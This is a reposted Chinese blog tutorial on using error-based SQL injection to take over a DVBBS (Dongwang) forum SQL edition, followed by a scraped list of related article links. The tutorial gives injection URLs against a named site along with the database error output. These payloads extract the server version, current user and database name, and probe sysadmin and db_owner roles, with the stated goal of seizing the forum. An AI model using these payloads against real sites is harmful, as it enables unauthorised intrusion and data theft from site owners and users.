现在动网最新版本是7.0+SP2。应该说安全性已经是很高的了。所以从脚本本身的问题去突破它难度不小。但是我们可以从外部的一些途径间接“搞定”动网.现在IIS+ASP+SQL2000的组合是比较常见的。而一个网站运用大量的ASP脚本程序,难免不出纰漏。如果一台主机上存在某个SQL注入点,而这台主机又安装有动网SQL版的话,基本上可以得出结论:这个动网就是你的了。下面来看一下实例。

  一、 首先确定目标

  假设以下URL存在SQL注入:
http://www.loveyou.com/type.asp?id=6 测试能否注入可以在6后面加个单引号。
http://www.loveyou.com/type.aspid=6' 返回错误提示:
Microsoft OLE DB Provider for ODBC Drivers 错误 '80040e14'
[Microsoft][ODBC SQL Server Driver][SQL Server]字符串 '' 之前有未闭合的引号。

  继续,先探测一下系统版本:
http://www.loveyou.com/type.asp?id=(select @@version)--
  返回:
Microsoft OLE DB Provider for ODBC Drivers 错误 '80040e07'
[Microsoft][ODBC SQL Server Driver]
[SQL Server]将 nvarchar 值 'Microsoft SQL Server
2000 - 8.00.760 (Intel X86) Dec 17 2002
14:22:05 Copyright (c) 1988-2003 Microsoft Corporation
Standard Edition on Windows NT 5.0 (Build 2195: Service Pack 4) ' 转换为数据类型为 int 的列时发生语法错误。

  看来已经打上最新的SP4补丁。

  取得当前连接数据库用户:
http://www.loveyou.com/type.asp?id=(select user_name())--

  返回:
Microsoft OLE DB Provider for ODBC Drivers 错误 '80040e07'
[Microsoft][ODBC SQL Server Driver]
[SQL Server]将 nvarchar 值 'webuser' 转换为数据类型为 int 的列时发生语法错误。

  从错误信息中得到当前数据库用户为:webuser
  取得当前连接数据库名:
http://www.loveyou.com/type.asp?id=(select db_name())--

  返回:
Microsoft OLE DB Provider for ODBC Drivers 错误 '80040e07'
[Microsoft][ODBC SQL Server Driver][SQL Server]将 nvarchar 值 '01city' 转换为数据类型为 int 的列时发生语法错误。

  从错误信息中得到当前数据库名为: 01city

  接下来测试下权限:(注:因为我们的目的是搞定动网而不是侵占系统。所以数据库权限对我们不是很重要。)
http://www.loveyou.com/type.asp?id=
(SELECT IS_SRVROLEMEMBER('sysadmin'))--

  返回错误信息。提示当前记录已删除。看来权限果然不是很高耶。继续,
http://www.loveyou.com/type.asp?id=
(SELECT%20IS_MEMBER('db_owner'))--

  正常显示信息,看来连接数据库拥有的权限是DB_OWNER(DOWN数据库所有者。但对操纵数据是绰绰有余了。

转载于:https://www.cnblogs.com/yinhaosln/archive/2008/03/17/1109744.html

SQL注入入侵动网SQL版论坛相关推荐

  1. 再谈SQL注入入侵动网SQL版

    再谈SQL注入入侵动网SQL版  编辑前言: 这个文章我没有测试,但前提条件还是很多,比如一定要有别的程序存在,而且也要用同一个SQLSERVER库,还得假设有注入漏洞.说到底和动网没有什么关系,但因 ...

  2. SQL注入入侵动网SQL

    编辑前言:这个文章我没有测试,但前提条件还是很多,比如一定要有别的程序存在,而且也要用同一个SQLSERVER库,还得假设有注入漏洞.说到底和动网没有什么关系,但因为动网论坛的开放性,让人熟悉了其数据 ...

  3. html页面sql注入,再谈SQL注入入侵动网SQL版-ASP TO HTML WITH TEMPLATE3

    5,处理数据功能显示页面addit.asp 首先是处理接受过来的数据,并将值写入数据库:接着将模板代码进行引用,并将其中特殊代码转换为接受值,最终通过FSO生成HTML页面.其中需要注意的还有,生成文 ...

  4. 记一次成功的sql注入入侵检测附带sql性能优化

    很多同学和园友都遇到过sql注入的,其中大部分都是代码的不严谨造成的,都是犯过很多错误才学会认真起来. 但是如果是让你接手一个二等残废的网站,并让你在上面改版,而且不能推翻式改版,只能逐步替换旧的程序 ...

  5. SQL注入--入侵动网

    编辑前言:这个文章我没有测试,但前提条件还是很多,比如一定要有别的程序存在,而且也要用同一个SQLSERVER库,还得假设有注入漏洞.说到底和动网没有什么关系,但因为动网论坛的开放性,让人熟悉了其数据 ...

  6. SQL注入原理及预防SQL注入的方法

    网络安全成为了现在互联网的焦点,这也恰恰触动了每一位用户的神经,担心网上的信息以及个人隐私遭到泄露.下面要为大家介绍的是SQL注入,对于sql注入,相信程序员都知道或者使用过,如果没有了解或完全没有听 ...

  7. sql注入及mybatis防止sql注入

    一.Sql 注入漏洞详解 Sql 注入产生原因及威胁: 当我们访问动态网页时, Web 服务器会向数据访问层发起 Sql 查询请求,如果权限验证通过就会执行 Sql 语句.这种网站内部直接发送的Sql ...

  8. php 预处理 防注入,PHP防止sql注入小技巧之sql预处理原理与实现方法分析

    本文实例讲述了PHP防止sql注入小技巧之sql预处理原理与实现方法.分享给大家供大家参考,具体如下: 我们可以把sql预处理看作是想要运行的 SQL 的一种编译过的模板,它可以使用变量参数进行定制. ...

  9. SQL注入-01-什么是SQL注入?

    什么是SQL注入? 1.正常的web端口访问 正常访问是web传入程序设计者所希望的参数值,由程序查询数据库完成处理后,呈现结果页面给用户. 2.SQL注入是如何访问? (1)SQL注入也是正常的we ...

最新文章

  1. pycharm add configuration怎么配置_python从入门到入土 | 环境配置(二)
  2. python 简易计算器(只能计算加减乘除和括号)
  3. python编译后的pyd爆破
  4. php sql server临时表,SQLServer中临时表与表变量的区别分析
  5. arcmap创建空间索引_GIS中创建空间索引的一种方法
  6. 记录一则数据库连接故障ORA-12560,ORA-12518
  7. Python中的第三方模块(微信为例)
  8. 未定义函数或变量 'wavplay'。原因:2014a已经移除函数
  9. 虚拟机与ubuntu(一):VirtureBox虚拟机安装和ubuntu14搭建
  10. AppFabric 版本区分
  11. OtherSoftwares
  12. excel 获取股票价格_股票价格的Excel点图
  13. 浙江大学计算机学院钱沄涛实验室,浙江大学导师介绍--钱沄涛
  14. 6.见过最强的后台管理系统
  15. 1023 : 大小写转换
  16. 手把手教你玩多数据源动态切换
  17. 阿里P8架构师谈(1):双11秒杀系统如何设计
  18. DevOps之运维平台构建
  19. Superset-轻量级开源可视化BI工具
  20. 用户注册——注册信息保存到数据库

热门文章

  1. 2023北京印刷学院计算机考研信息汇总
  2. HAproxy的配置详解
  3. Teams Surface pro上进行Teams会议,插耳机无效的问题
  4. Word2Vec语言模型训练和使用
  5. 大数据平台核心技术 学堂在线 雨课堂 第七讲作业答案 人文交流月
  6. 《进销存管理系统——“系统管理”模块》项目研发阶段性总结
  7. Impala 在网易大数据的优化和实践
  8. 基于Python PHP+mysql的校园电脑外设的电商平台
  9. 嘟!数字三角形 W WW WWW集合!
  10. vue element表格默认选中表格第一行